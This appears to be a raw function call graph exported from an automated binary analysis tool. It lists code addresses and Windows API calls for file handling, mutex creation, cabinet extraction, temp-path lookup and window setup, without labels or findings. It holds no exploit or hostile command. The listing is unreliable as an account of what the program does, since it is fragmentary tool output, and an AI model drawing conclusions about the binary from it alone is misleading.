25993 402456 27121 426ae0 GetObjectType DeleteObject DestroyIcon memset HeapFree 25993->27121 26000 426c00 39 API calls 25994->26000 26002 41c085 8 API calls 25996->26002 26003 410143 11 API calls 25997->26003 26000->25985 26002->26007 26008 401f79 26003->26008 26004 429950 2 API calls 26009 4030e7 ExtractIconW 26004->26009 26005 402460 27122 424104 26005->27122 26007->25969 26007->25970 26012 4299b0 2 API calls 26008->26012 26013 406de3 6 API calls 26009->26013 26015 401f83 26012->26015 26016 403128 26013->26016 27087 410007 6 API calls 26015->27087 26019 429950 2 API calls 26016->26019 26022 403132 ExtractIconW 26019->26022 26021 401f92 26024 410143 11 API calls 26021->26024 26025 403267 26022->26025 26026 403167 26022->26026 26027 401fad 26024->26027 26907 427011 26025->26907 26031 4299b0 2 API calls 26027->26031 26034 401fb7 26031->26034 26038 410143 11 API calls 26034->26038 26042 401fcd 26038->26042 26046 4299b0 2 API calls 26042->26046 26051 401fd7 26046->26051 27088 410007 6 API calls 26051->27088 26059 401fe6 26063 410143 11 API calls 26059->26063 26067 402001 26063->26067 26070 4299b0 2 API calls 26067->26070 26074 40200b 26070->26074 27089 410007 6 API calls 26074->27089 26080 40201a 26084 410143 11 API calls 26080->26084 26085 402035 26084->26085 26091 4299b0 2 API calls 26085->26091 26096 40203f 26091->26096 26101 410143 11 API calls 26096->26101 26104 402055 26101->26104 26108 4299b0 2 API calls 26104->26108 26113 40205f 26108->26113 26117 410143 11 API calls 26113->26117 26121 40207b 26117->26121 27090 410007 6 API calls 26121->27090 26127 4020a3 26130 410143 11 API calls 26127->26130 26132 4020be 26130->26132 26134 4299b0 2 API calls 26132->26134 26135 4020c8 26134->26135 26137 410143 11 API calls 26135->26137 26139 4020de 26137->26139 26142 4299b0 2 API calls 26139->26142 26144 4020e8 26142->26144 26146 410143 11 API calls 26144->26146 26149 4020fe 26146->26149 26154 4299b0 2 API calls 26149->26154 26160 402108 26154->26160 26165 410143 11 API calls 26160->26165 26170 40211e 26165->26170 26175 4299b0 2 API calls 26170->26175 26179 402128 26175->26179 27091 410007 6 API calls 26179->27091 26188 402137 27092 410007 6 API calls 26188->27092 26194 40214b 26200 40215b 26194->26200 26201 40217d 26194->26201 27093 40ae14 12 API calls 26200->27093 27094 40aeb0 12 API calls 26201->27094 26211 402167 26220 4299b0 2 API calls 26211->26220 26213 402189 26222 4299b0 2 API calls 26213->26222 26227 402171 26220->26227 26222->26227 26236 4021c0 26227->26236 26237 4021a8 26227->26237 27096 40afe8 12 API calls 26236->27096 27095 40af4c 12 API calls 26237->27095 26245 4021b4 26250 4299b0 2 API calls 26245->26250 26246 4021cc 26251 4299b0 2 API calls 26246->26251 26254 4021be 26250->26254 26251->26254 26260 410024 29 API calls 26254->26260 26260->25755 26439->25502 27634 427f4b HeapAlloc HeapAlloc 26440->27634 26442 42774d 27635 428040 HeapAlloc 26442->27635 26445 42759b TlsAlloc 26445->25506 26447 428040 HeapAlloc 26446->26447 26448 401062 26447->26448 26449 426b59 26448->26449 27637 427f4b HeapAlloc HeapAlloc 26449->27637 26451 401067 26452 425d57 LoadLibraryW 26451->26452 26453 425d77 GetProcAddress 26452->26453 26454 425d88 GetVersionExW 26452->26454 26453->26454 26455 425dad 26454->26455 26457 40106c 26455->26457 27638 425c9e LoadLibraryW 26455->27638 26458 425997 26457->26458 26459 428040 HeapAlloc 26458->26459 26460 401071 26459->26460 26461 424279 26460->26461 27648 427f4b HeapAlloc HeapAlloc 26461->27648 26463 424287 26464 428040 HeapAlloc 26463->26464 26465 42429a LoadIconW LoadCursorW 26464->26465 26465->25516 27649 427f4b HeapAlloc HeapAlloc 26466->27649 26468 41fcad 26469 428040 HeapAlloc 26468->26469 26470 41fcc3 memset InitCommonControlsEx 26469->26470 26470->25518 26472 427b1d 16 API calls 26471->26472 26473 41c9fe 26472->26473 26474 427a6c 11 API calls 26473->26474 26475 41ca17 26474->26475 26476 427b1d 16 API calls 26475->26476 26477 41ca22 26476->26477 26478 427a6c 11 API calls 26477->26478 26479 41ca3b 26478->26479 26480 427b1d 16 API calls 26479->26480 26481 41ca46 26480->26481 26482 427a6c 11 API calls 26481->26482 26483 41ca5f 26482->26483 26484 427b1d 16 API calls 26483->26484 26485 41ca6a 26484->26485 26486 427a6c 11 API calls 26485->26486 26487 41ca83 26486->26487 26488 427b1d 16 API calls 26487->26488 26489 41ca8e 26488->26489 26490 427a6c 11 API calls 26489->26490 26491 41caa7 26490->26491 26492 427b1d 16 API calls 26491->26492 26493 41cab2 26492->26493 26494 427a6c 11 API calls 26493->26494 26495 41cacb 26494->26495 26496 427b1d 16 API calls 26495->26496 26497 41cad6 26496->26497 26498 427a6c 11 API calls 26497->26498 26499 41caef 26498->26499 26500 427b1d 16 API calls 26499->26500 26501 41cafa 26500->26501 26502 427a6c 11 API calls 26501->26502 26503 41cb13 26502->26503 27650 41cb48 26503->27650 26506 41c580 HeapCreate 26506->25522 27661 427f4b HeapAlloc HeapAlloc 26507->27661 26509 40108a 26510 41152d 26509->26510 26511 427b1d 16 API calls 26510->26511 26512 411538 26511->26512 26513 427a6c 11 API calls 26512->26513 26514 411553 26513->26514 27662 40a008 26514->27662 27672 427f4b HeapAlloc HeapAlloc 26517->27672 26519 401099 26520 40fc47 memset 26519->26520 26520->25530 26522 428040 HeapAlloc 26521->26522 26523 40f48c 26522->26523 27673 427f4b HeapAlloc HeapAlloc 26523->27673 26525 40f49f InitializeCriticalSection 26525->25532 26526->25534 26527->25536 27674 4298d0 HeapCreate HeapAlloc 26528->27674 26530 4010b7 26531 427b1d 26530->26531 26532 4010cc 26531->26532 26533 427b29 26531->26533 26542 427a6c RtlAllocateHeap 26532->26542 27675 427ce3 EnterCriticalSection HeapFree LeaveCriticalSection HeapFree 26533->27675 26535 427b30 27676 428437 9 API calls 26535->27676 26537 427b38 26538 427b51 HeapFree 26537->26538 26541 427b63 26537->26541 26538->26538 26538->26541 26539 427b75 HeapFree 26539->26532 26540 427b69 HeapFree 26540->26539 26541->26539 26541->26540 26543 427a8b HeapAlloc 26542->26543 26544 427a9e 26542->26544 26543->26544 27677 42807b 26544->27677 27694 40a000 26547->27694 26550 40490d 26551 404941 26550->26551 26552 404924 ReleaseMutex CloseHandle 26550->26552 27697 429a70 26551->27697 26552->26551 26555->25553 27706 411437 26556->27706 26559 4113b6 memset 26560 4113f3 26559->26560 26560->25554 27717 429c80 26561->27717 26564 40f4e5 memmove 26565 40f4fa 26564->26565 26565->25559 26567 41bf1e 26566->26567 26568 429c80 RtlReAllocateHeap 26567->26568 26569 41bf65 26568->26569 26570 40117e 26569->26570 26571 41bf79 wcsncpy 26569->26571 26572 41bf94 26570->26572 26571->26570 26573 40118c 26572->26573 26574 41bf9b SetCurrentDirectoryW 26572->26574 26575 41bfa4 26573->26575 26574->26573 26576 429c80 RtlReAllocateHeap 26575->26576 26577 41bfb7 GetTempPathW LoadLibraryW 26576->26577 26578 41bff2 26577->26578 26579 41bfd4 GetProcAddress 26577->26579 26578->25565 26580 41bfe4 GetLongPathNameW 26579->26580 26581 41bfeb FreeLibrary 26579->26581 26580->26581 26581->26578 26583 42995f wcslen 26582->26583 26585 42997e 26582->26585 26584 429c80 RtlReAllocateHeap 26583->26584 26584->26585 26585->25567 26587 407034 26586->26587 26587->26587 26588 407041 CoCreateGuid 26587->26588 26589 407059 26588->26589 26600 4070ab 26588->26600 27720 428df0 26589->27720 26591 429a70 HeapFree 26593 4070cd 26591->26593 26595 429a70 HeapFree 26593->26595 26594 4299b0 2 API calls 26596 407074 26594->26596 26597 4011b3 26595->26597 26598 40707d StringFromGUID2 26596->26598 26597->25570 27724 41c5d0 MultiByteToWideChar MultiByteToWideChar RtlReAllocateHeap 26598->27724 26600->26591 26602 4299e3 HeapReAlloc 26601->26602 26603 4299c7 RtlAllocateHeap 26601->26603 26604 429a04 26602->26604 26603->26604 26604->25573 26606 41c015 wcsncpy wcslen 26605->26606 26608 4011d3 26605->26608 26607 41c046 CreateDirectoryW 26606->26607 26607->26608 26608->25576 26608->25577 27725 41b4c0 26610->27725 26612 401259 26612->25594 26612->25595 26616 41b659 26613->26616 26614 41b691 26614->25599 26615 41b671 GetFileSize 26615->25599 26616->26614 26616->26615 27759 41b3f0 26616->27759 26619 41b6b2 26618->26619 26620 40128a 26619->26620 26621 41b6d2 SetFilePointer 26619->26621 26622 41b3f0 WriteFile 26619->26622 26624 41b6f0 26620->26624 26621->26620 26623 41b6c4 26622->26623 26623->26621 26625 41b714 26624->26625 26626 41b74a 26625->26626 26627 41b721 26625->26627 26628 41b737 ReadFile 26625->26628 26626->25604 27762 41bc80 26627->27762 26628->26626 26630 41b72a 26630->25604 26632 41b4c0 10 API calls 26631->26632 26633 401346 26632->26633 26633->25617 26633->25624 26635 41b777 26634->26635 26636 41b7aa 26635->26636 26637 41b785 26635->26637 26638 41b797 ReadFile 26635->26638 26636->25624 26639 41bc80 6 API calls 26637->26639 26638->26636 26640 41b78e 26639->26640 26640->25624 26642 41b7da 26641->26642 26643 41b808 26642->26643 26644 41b7f5 WriteFile 26642->26644 26645 41b7e8 26642->26645 26643->25624 26644->26643 27774 41bdb0 26645->27774 26647 41b7f1 26647->25624 26650 41b438 26648->26650 26649 4013b5 26649->25629 26650->26649 26651 41b46c FindCloseChangeNotification 26650->26651 26652 41b3f0 WriteFile 26650->26652 26653 427f10 2 API calls 26651->26653 26654 41b459 RtlFreeHeap 26652->26654 26653->26649 26654->26651 26656 40a000 2 API calls 26655->26656 26657 404962 26656->26657 26658 40a000 2 API calls 26657->26658 26659 40496f SetupIterateCabinetW 26658->26659 26660 40498e 26659->26660 26661 429a70 HeapFree 26660->26661 26662 404996 26661->26662 26663 429a70 HeapFree 26662->26663 26664 401435 26663->26664 26664->25637 26664->25638 26666 41c0a0 26665->26666 26667 401488 26665->26667 26666->26667 26668 41c0aa wcsncpy wcslen 26666->26668 26667->25648 26667->25649 26669 41c0dc 26668->26669 26670 41c125 FindFirstFileW 26669->26670 26671 41c0eb 26669->26671 26675 41c180 26670->26675 26676 41c14e FindClose 26670->26676 26672 41c0f0 wcscat 26671->26672 26673 41c103 GetDriveTypeW 26671->26673 26672->26673 26673->26667 26675->26667 26677 41c1a6 GetFileAttributesW 26675->26677 26676->26667 26679 41c1b7 26677->26679 26680 41c1bd GetDriveTypeW 26677->26680 26679->26667 26680->26667 26680->26679 26682 410024 29 API calls 26681->26682 26683 40fcc1 CreateFileW 26682->26683 26685 40fcf9 CreateFileW 26683->26685 26686 40fd3d GetFileSize 26683->26686 26687 40fd14 CreateFileW 26685->26687 26688 40fd2a 26685->26688 26689 40fd89 26686->26689 26690 40fd59 ReadFile 26686->26690 26687->26688 26688->26686 26691 40ffbc wcslen HeapAlloc 26688->26691 26696 40fe51 HeapAlloc 26689->26696 26697 40fdc9 HeapAlloc 26689->26697 26703 40fe7b 26689->26703 26692 40fd73 memcmp 26690->26692 26693 40fd98 SetFilePointer 26690->26693 26694 40fff0 wcscpy 26691->26694 26695 40161a 26691->26695 26692->26689 26692->26693 26693->26689 26694->26695 26695->25680 26988 410007 6 API calls 26695->26988 26696->26695 26698 40fe64 ReadFile 26696->26698 26699 40fddc HeapAlloc 26697->26699 26697->26703 26698->26703 26699->26695 26700 40fdfd ReadFile 26699->26700 27785 429d20 26700->27785 26703->26695 26703->26703 26704 40fc7e HeapAlloc HeapAlloc 26703->26704 26704->26703 26706 41b4c0 10 API calls 26705->26706 26707 401959 26706->26707 26707->25703 26707->25898 26709 40a000 2 API calls 26708->26709 26710 409313 26709->26710 26711 40a000 2 API calls 26710->26711 26712 409320 26711->26712 27787 428920 26712->27787 26715 4299b0 2 API calls 26716 40934a 26715->26716 26717 428920 10 API calls 26716->26717 26718 40936a 26717->26718 26719 4299b0 2 API calls 26718->26719 26720 409374 26719->26720 26721 428920 10 API calls 26720->26721 26722 409394 26721->26722 26723 4299b0 2 API calls 26722->26723 26724 40939e 26723->26724 26725 428920 10 API calls 26724->26725 26726 4093be 26725->26726 26727 4299b0 2 API calls 26726->26727 26728 4093c8 26727->26728 26729 40f50d 3 API calls 26728->26729 26730 4093e5 26729->26730 26731 428920 10 API calls 26730->26731 26732 409404 26731->26732 26733 4299b0 2 API calls 26732->26733 26734 40940e 26733->26734 26735 40f50d 3 API calls 26734->26735 26736 40942b 26735->26736 26737 428920 10 API calls 26736->26737 26738 40944a 26737->26738 26739 4299b0 2 API calls 26738->26739 26740 409454 26739->26740 26741 40f50d 3 API calls 26740->26741 26742 409471 26741->26742 26743 428920 10 API calls 26742->26743 26744 409490 26743->26744 26745 4299b0 2 API calls 26744->26745 26746 40949a 26745->26746 26747 40f50d 3 API calls 26746->26747 26748 4094b7 26747->26748 26749 428920 10 API calls 26748->26749 26750 4094d6 26749->26750 26751 4299b0 2 API calls 26750->26751 26752 4094e0 26751->26752 26753 406de3 6 API calls 26752->26753 26754 4094fc 26753->26754 26755 428920 10 API calls 26754->26755 26756 40951b 26755->26756 26757 4299b0 2 API calls 26756->26757 26758 409525 26757->26758 27790 406f6d 26758->27790 26761 428920 10 API calls 26762 409560 26761->26762 26763 4299b0 2 API calls 26762->26763 26764 40956a 26763->26764 27807 406eac 26764->27807 26767 428920 10 API calls 26768 4095a5 26767->26768 26769 4299b0 2 API calls 26768->26769 26770 4095af 26769->26770 27824 406987 26770->27824 26773 428920 10 API calls 26774 4095ea 26773->26774 26775 4299b0 2 API calls 26774->26775 26776 4095f4 26775->26776 27841 406c0e 26776->27841 26779 428920 10 API calls 26780 40962f 26779->26780 26781 4299b0 2 API calls 26780->26781 26782 409639 26781->26782 27859 406cf1 26782->27859 26785 428920 10 API calls 26786 409674 26785->26786 26787 4299b0 2 API calls 26786->26787 26788 40967e 26787->26788 27877 4066c8 26788->27877 26791 428920 10 API calls 26792 4096b9 26791->26792 26793 4299b0 2 API calls 26792->26793 26794 4096c3 26793->26794 27895 4067ab 26794->27895 26797 428920 10 API calls 26798 4096fe 26797->26798 26799 4299b0 2 API calls 26798->26799 26800 409708 26799->26800 27913 406a48 26800->27913 26803 428920 10 API calls 26804 409743 26803->26804 26805 4299b0 2 API calls 26804->26805 26806 40974d 26805->26806 27931 406b2b 26806->27931 26809 428920 10 API calls 26810 409788 26809->26810 26811 4299b0 2 API calls 26810->26811 26812 409792 26811->26812 27949 40688e 26812->27949 26815 428920 10 API calls 26816 4097cd 26815->26816 26817 4299b0 2 API calls 26816->26817 26818 4097d7 26817->26818 27967 40633c 26818->27967 26821 428920 10 API calls 26822 409812 26821->26822 26823 4299b0 2 API calls 26822->26823 26824 40981c 26823->26824 27985 40641f 26824->27985 26827 428920 10 API calls 26828 409857 26827->26828 26829 4299b0 2 API calls 26828->26829 26830 409861 26829->26830 28003 406176 26830->28003 26833 428920 10 API calls 26834 40989c 26833->26834 26835 4299b0 2 API calls 26834->26835 26836 4098a6 26835->26836 28021 406259 26836->28021 26839 428920 10 API calls 26840 4098e1 26839->26840 26841 4299b0 2 API calls 26840->26841 26842 4098eb 26841->26842 28039 428b30 26842->28039 26844 409919 26845 428920 10 API calls 26844->26845 26846 409938 26845->26846 26847 4299b0 2 API calls 26846->26847 26851 409942 26847->26851 26848 409984 26850 429950 2 API calls 26848->26850 26849 428950 10 API calls 26849->26851 26852 409992 26850->26852 26851->26848 26851->26849 26853 4299b0 2 API calls 26851->26853 26854 429a70 HeapFree 26852->26854 26853->26851 26855 4099b3 26854->26855 26856 429a70 HeapFree 26855->26856 26857 4021f1 26856->26857 26857->25765 26859 410045 26858->26859 26860 4100e7 26859->26860 26862 410066 WideCharToMultiByte HeapAlloc 26859->26862 26861 41010a HeapFree 26860->26861 26863 410114 26860->26863 26861->26863 26864 410094 26862->26864 26865 41009b WideCharToMultiByte 26862->26865 26866 410124 HeapFree 26863->26866 26867 4024e5 26863->26867 26864->26867 26865->26860 26868 4100b6 26865->26868 26866->26867 26871 410143 26867->26871 26869 4100be _stricmp 26868->26869 26870 4100d3 26868->26870 26869->26868 26869->26870 26870->26860 28066 41022d 26871->28066 26874 4101e8 26878 4101fa wcslen 26874->26878 26875 41015b MultiByteToWideChar 26877 429c80 RtlReAllocateHeap 26875->26877 26879 41018f MultiByteToWideChar 26877->26879 26880 429c80 RtlReAllocateHeap 26878->26880 26884 4101a6 26879->26884 26885 4101e6 26879->26885 26881 41020c 26880->26881 26882 41021b wcscpy 26881->26882 26882->26885 26883 4101d7 wcslen 26883->26885 26884->26883 26884->26885 26885->25870 26887 428650 10 API calls 26886->26887 26888 402522 26887->26888 26888->25910 26890 428df0 RtlReAllocateHeap 26889->26890 26891 406e00 26890->26891 26892 4299b0 2 API calls 26891->26892 26893 406e0a GetSystemDirectoryW 26892->26893 26894 406e20 26893->26894 26895 406e77 26893->26895 26897 428c10 RtlReAllocateHeap 26894->26897 26896 429950 2 API calls 26895->26896 26898 406e85 26896->26898 26900 406e35 26897->26900 26899 429a70 HeapFree 26898->26899 26901 4030dd 26899->26901 26900->26895 26902 429950 2 API calls 26900->26902 26901->26004 26903 406e63 26902->26903 26904 429950 2 API calls 26903->26904 26905 406e6d 26904->26905 26906 4299b0 2 API calls 26905->26906 26906->26895 26946->25557 26947->25581 26949 41c085 8 API calls 26948->26949 26951 4049b2 26949->26951 26950 4011fd 26953 4048a2 ReleaseMutex CloseHandle CoUninitialize 26950->26953 26951->26950 28989 41c1f3 26951->28989 26953->25588 26954->25623 26955->25588 26956->25598 26957->25588 26958->25641 26959->25588 29020 426b6d CreateFileW 26960->29020 26963->25665 26965 426c69 26964->26965 26966 426c73 GetObjectType 26965->26966 26967 426ca1 26965->26967 26966->26967 26968 426c84 26966->26968 26967->25671 26968->26967 26969 42709d 4 API calls 26968->26969 26970 426cb9 26969->26970 26971 426d96 DeleteObject 26970->26971 26972 426cc4 CreateCompatibleDC 26970->26972 26971->26967 26973 426d95 26972->26973 26974 426cd9 CreateCompatibleDC 26972->26974 26973->26971 26975 426ce7 SelectObject SelectObject 26974->26975 26976 426d8c DeleteDC 26974->26976 29032 425ecc 11 API calls 26975->29032 26976->26973 26978 426d05 26979 426d09 26978->26979 26980 426d2f 26978->26980 26982 426d4d SetStretchBltMode 26979->26982 26983 426d0e 26979->26983 26981 426d34 SetStretchBltMode SetBrushOrgEx 26980->26981 26980->26982 26984 426d58 StretchBlt 26981->26984 26982->26984 29033 426a47 15 API calls 26983->29033 26986 426d83 DeleteDC 26984->26986 26987 426d26 26984->26987 26986->26976 26987->26986 26988->25684 26990 408b09 26989->26990 26990->26990 26991 427766 4 API calls 26990->26991 26992 408b3b 26991->26992 26993 408e10 26992->26993 26994 408b50 26992->26994 26996 429950 2 API calls 26993->26996 26995 4279d1 2 API calls 26994->26995 26997 408b61 26995->26997 26998 408e05 26996->26998 27000 427698 3 API calls 26997->27000 26999 429a70 HeapFree 26998->26999 27001 408e45 26999->27001 27002 408b8e GetSystemInfo 27000->27002 27003 429a70 HeapFree 27001->27003 29034 4291b0 27002->29034 27005 408e51 27003->27005 27005->25694 27006 408bb1 27007 429950 2 API calls 27006->27007 27008 408bbb 27007->27008 27009 4291b0 RtlReAllocateHeap 27008->27009 27010 408bcd 27009->27010 27011 4299b0 2 API calls 27010->27011 27012 408bdb 27011->27012 27013 408bf1 27012->27013 27014 408c07 27012->27014 27015 40a008 4 API calls 27013->27015 27016 408c16 27014->27016 27017 408c2c 27014->27017 27031 408c02 27015->27031 27018 40a008 4 API calls 27016->27018 27020 408c92 27017->27020 27021 408c3b 27017->27021 27018->27031 27019 429950 2 API calls 27019->26998 27024 408ca1 27020->27024 27025 408cda 27020->27025 27022 408c69 27021->27022 27023 408c7c 27021->27023 27026 40a008 4 API calls 27022->27026 27027 40a008 4 API calls 27023->27027 27028 408cb1 27024->27028 27029 408cc4 27024->27029 27033 408d22 27025->27033 27034 408ce9 27025->27034 27026->27031 27027->27031 27032 40a008 4 API calls 27028->27032 27030 40a008 4 API calls 27029->27030 27030->27031 27031->27019 27032->27031 27039 408d31 27033->27039 27040 408d6a 27033->27040 27035 408cf9 27034->27035 27036 408d0c 27034->27036 27037 40a008 4 API calls 27035->27037 27038 40a008 4 API calls 27036->27038 27037->27031 27038->27031 27041 408d41 27039->27041 27042 408d54 27039->27042 27045 408d79 27040->27045 27050 408daf 27040->27050 27043 40a008 4 API calls 27041->27043 27044 40a008 4 API calls 27042->27044 27043->27031 27044->27031 27046 408d89 27045->27046 27047 408d9c 27045->27047 27048 40a008 4 API calls 27046->27048 27049 40a008 4 API calls 27047->27049 27048->27031 27049->27031 27050->27031 27051 408de1 27050->27051 27052 408dce 27050->27052 27054 40a008 4 API calls 27051->27054 27053 40a008 4 API calls 27052->27053 27053->27031 27054->27031 27055->25695 27056->25702 27057->25712 27058->25718 27059->25729 27060->25738 27061->25746 27062->25756 27063->25763 29043 40fa07 27064->29043 27066 41002e 27066->25680 27067->25687 27068->25588 27069->25898 27070->25898 27071->25898 27072->25898 27073->25787 27074->25787 27075->25782 27076->25786 27077->25796 27078->25805 27079->25816 27080->25826 27081->25835 27082->25860 27083->25872 27084->25887 27085->25953 27086->25965 27087->26021 27088->26059 27089->26080 27090->26127 27091->26188 27092->26194 27093->26211 27094->26213 27095->26245 27096->26246 27097->25794 29075 4242c5 27098->29075 27102 424608 27101->27102 27102->25885 27104 42462a 27103->27104 27105 424630 GetClientRect GetMenu 27104->27105 27106 40235b 27104->27106 27105->27106 27107 42464f 27105->27107 27109 42466b 27106->27109 27107->27106 27108 424655 GetSystemMetrics 27107->27108 27108->27106 27110 42467f 27109->27110 27111 424683 GetClientRect 27110->27111 27112 402366 27110->27112 27111->27112 27113 4201e2 27112->27113 29109 4200e8 27113->29109 27116->25962 27117->25924 27118->25937 27119->25937 27120->25993 27121->26005 27123 42411c 27122->27123 27124 4241f6 27123->27124 27125 424126 GetWindow 27123->27125 27124->25789 27126 424141 RemovePropW RemovePropW 27125->27126 27127 424134 27125->27127 27129 424167 27126->27129 27130 42415f RevokeDragDrop 27126->27130 27127->27126 27128 42413a SetActiveWindow 27127->27128 27128->27126 27131 424180 KiUserCallbackDispatcher 27129->27131 27132 42416e SendMessageW 27129->27132 27130->27129 27143->25832 27144->25588 27145->25802 27146->25823 29127 420267 27147->29127 27150 420990 17 API calls 27150->25861 27152 4209fc _strftime 27151->27152 27153 420a45 CreateWindowExW 27152->27153 27154 420a0e memset 27152->27154 27156 402d5c 27153->27156 27157 420a89 27153->27157 27154->27153 27161 420aad 27156->27161 27158 427e22 3 API calls 27157->27158 27159 420a97 27158->27159 27160 42352c 4 API calls 27159->27160 27160->27156 27162 4209ea 9 API calls 27161->27162 27163 402d7d 27162->27163 27163->25900 27164->25955 27165->25955 27166->25950 27167->25588 27634->26442 27636 401058 27635->27636 27636->26445 27637->26451 27639 425d13 LoadLibraryW 27638->27639 27640 425ccb GetProcAddress 27638->27640 27643 425d20 GetProcAddress 27639->27643 27644 425d4f 27639->27644 27641 425cda memset 27640->27641 27642 425d0c FreeLibrary 27640->27642 27646 425cf8 27641->27646 27642->27639 27645 425d48 FreeLibrary 27643->27645 27647 425d2c 27643->27647 27644->26457 27645->27644 27646->27642 27647->27645 27648->26463 27649->26468 27651 427766 4 API calls 27650->27651 27652 41cb5b 27651->27652 27653 401080 27652->27653 27657 4279d1 27652->27657 27653->26506 27655 41cb72 27656 427698 3 API calls 27655->27656 27656->27653 27658 427a23 27657->27658 27659 4279e2 27657->27659 27658->27655 27659->27658 27660 4279f7 WideCharToMultiByte GetProcAddress 27659->27660 27660->27658 27661->26509 27665 429bd0 27662->27665 27664 40a00f 27664->25526 27666 429be1 wcslen 27665->27666 27667 429c4d 27665->27667 27668 429c16 HeapReAlloc 27666->27668 27669 429bf8 HeapAlloc 27666->27669 27670 429c55 HeapFree 27667->27670 27671 429c38 27667->27671 27668->27671 27669->27671 27670->27671 27671->27664 27672->26519 27673->26525 27674->26530 27675->26535 27676->26537 27678 42809a 27677->27678 27679 428161 HeapAlloc 27678->27679 27680 4280ab 27678->27680 27682 4281a5 27679->27682 27683 428178 27679->27683 27693 4284e6 LoadLibraryA GetProcAddress FreeLibrary Sleep 27680->27693 27684 4010e7 27682->27684 27683->27682 27686 428196 InitializeCriticalSection 27683->27686 27684->25543 27685 4280ba EnterCriticalSection 27688 4280cc 27685->27688 27686->27682 27687 4280ee HeapAlloc 27689 428103 27687->27689 27692 428119 LeaveCriticalSection 27687->27692 27688->27687 27688->27692 27690 42807b 4 API calls 27689->27690 27690->27692 27692->27684 27693->27685 27700 429b80 27694->27700 27698 429a7b HeapFree 27697->27698 27699 401117 27697->27699 27698->27699 27699->25549 27699->25550 27701 4048e3 CreateMutexW GetLastError 27700->27701 27702 429b8a wcslen HeapAlloc 27700->27702 27701->26550 27704 429ef0 27702->27704 27705 429f00 27704->27705 27705->27701 27707 411397 HeapAlloc 27706->27707 27711 411440 27706->27711 27707->26559 27707->26560 27708 411469 HeapFree 27708->27707 27709 411467 27709->27708 27711->27708 27711->27709 27712 40a010 27711->27712 27713 40a0da 27712->27713 27714 40a026 27712->27714 27713->27711 27714->27713 27715 40a010 HeapFree 27714->27715 27716 429a70 HeapFree 27714->27716 27715->27714 27716->27714 27718 429ca2 RtlReAllocateHeap 27717->27718 27719 40f4c2 GetModuleFileNameW wcscmp 27717->27719 27718->27719 27719->26564 27719->26565 27721 428df9 27720->27721 27722 429c80 RtlReAllocateHeap 27721->27722 27723 40706a 27722->27723 27723->26594 27724->26600 27741 427e22 27725->27741 27728 41b4e1 CreateFileW 27730 41b55c 27728->27730 27729 41b4fd 27731 41b502 CreateFileW 27729->27731 27732 41b51f 27729->27732 27734 41b56b 27730->27734 27736 41b5b6 27730->27736 27731->27730 27732->27730 27733 41b524 CreateFileW 27732->27733 27733->27730 27737 41b546 CreateFileW 27733->27737 27738 41b574 RtlAllocateHeap 27734->27738 27739 41b588 27734->27739 27735 41b5ca 27735->26612 27736->27735 27750 427f10 27736->27750 27737->27730 27738->27739 27739->26612 27742 427e43 27741->27742 27743 427e2c 27741->27743 27745 427e6e 27742->27745 27746 427e4e HeapReAlloc 27742->27746 27757 4285d0 HeapAlloc 27743->27757 27748 427e88 HeapAlloc 27745->27748 27749 41b4da 27745->27749 27746->27745 27747 427e3f 27747->27749 27748->27749 27749->27728 27749->27729 27751 427f3c 27750->27751 27752 427f1c 27750->27752 27758 428590 HeapFree 27751->27758 27752->27751 27753 427f21 27752->27753 27755 427f46 27753->27755 27756 427f2c memset 27753->27756 27755->27735 27756->27755 27757->27747 27758->27755 27760 41b401 WriteFile 27759->27760 27761 41b422 27759->27761 27760->27761 27761->26615 27763 41bc8d 27762->27763 27767 41bc93 27762->27767 27764 41b3f0 WriteFile 27763->27764 27764->27767 27765 41bd1a memcpy 27769 41bd63 ReadFile 27765->27769 27770 41bd3f ReadFile 27765->27770 27766 41bcac 27768 41bcdf 27766->27768 27773 41bcc5 memcpy 27766->27773 27767->27765 27767->27766 27768->26630 27771 41bd84 27769->27771 27772 41bd86 memcpy 27769->27772 27770->26630 27771->27772 27772->26630 27773->26630 27775 41bde5 27774->27775 27776 41bdc5 SetFilePointer 27774->27776 27777 41bdf0 27775->27777 27778 41be5e 27775->27778 27776->27775 27780 41be23 27777->27780 27784 41be09 memcpy 27777->27784 27779 41b3f0 WriteFile 27778->27779 27781 41be64 27779->27781 27780->26647 27782 41be8b memcpy 27781->27782 27783 41be6b WriteFile 27781->27783 27782->26647 27783->26647 27784->26647 27786 40fe35 HeapFree 27785->27786 27786->26703 28043 428650 27787->28043 27791 40f50d 3 API calls 27790->27791 27792 406f8a 27791->27792 27793 4299b0 2 API calls 27792->27793 27794 406f9b 27793->27794 27795 406ff9 27794->27795 27797 428c10 RtlReAllocateHeap 27794->27797 27796 429950 2 API calls 27795->27796 27798 407007 27796->27798 27799 406fb7 27797->27799 27800 429a70 HeapFree 27798->27800 27799->27795 27802 429950 2 API calls 27799->27802 27801 407028 27800->27801 27801->26761 27803 406fe5 27802->27803 27804 429950 2 API calls 27803->27804 27805 406fef 27804->27805 27806 4299b0 2 API calls 27805->27806 27806->27795 27808 40f50d 3 API calls 27807->27808 27809 406ec9 27808->27809 27810 4299b0 2 API calls 27809->27810 27811 406eda 27810->27811 27812 406f38 27811->27812 27814 428c10 RtlReAllocateHeap 27811->27814 27813 429950 2 API calls 27812->27813 27815 406f46 27813->27815 27818 406ef6 27814->27818 27816 429a70 HeapFree 27815->27816 27817 406f67 27816->27817 27817->26767 27818->27812 27819 429950 2 API calls 27818->27819 27820 406f24 27819->27820 27821 429950 2 API calls 27820->27821 27822 406f2e 27821->27822 27823 4299b0 2 API calls 27822->27823 27823->27812 27825 40f50d 3 API calls 27824->27825 27826 4069a4 27825->27826 27827 4299b0 2 API calls 27826->27827 27828 4069b5 27827->27828 27829 406a13 27828->27829 27831 428c10 RtlReAllocateHeap 27828->27831 27830 429950 2 API calls 27829->27830 27832 406a21 27830->27832 27834 4069d1 27831->27834 27833 429a70 HeapFree 27832->27833 27835 406a42 27833->27835 27834->27829 27836 429950 2 API calls 27834->27836 27835->26773 27837 4069ff 27836->27837 27838 429950 2 API calls 27837->27838 27839 406a09 27838->27839 27840 4299b0 2 API calls 27839->27840 27840->27829 27842 428df0 RtlReAllocateHeap 27841->27842 27843 406c2c 27842->27843 27844 4299b0 2 API calls 27843->27844 27845 406c3d SHGetSpecialFolderLocation SHGetPathFromIDListW 27844->27845 27846 406c65 27845->27846 27847 406cbc 27845->27847 27849 428c10 RtlReAllocateHeap 27846->27849 27848 429950 2 API calls 27847->27848 27850 406cca 27848->27850 27852 406c7a 27849->27852 27851 429a70 HeapFree 27850->27851 27853 406ceb 27851->27853 27852->27847 27854 429950 2 API calls 27852->27854 27853->26779 27855 406ca8 27854->27855 27856 429950 2 API calls 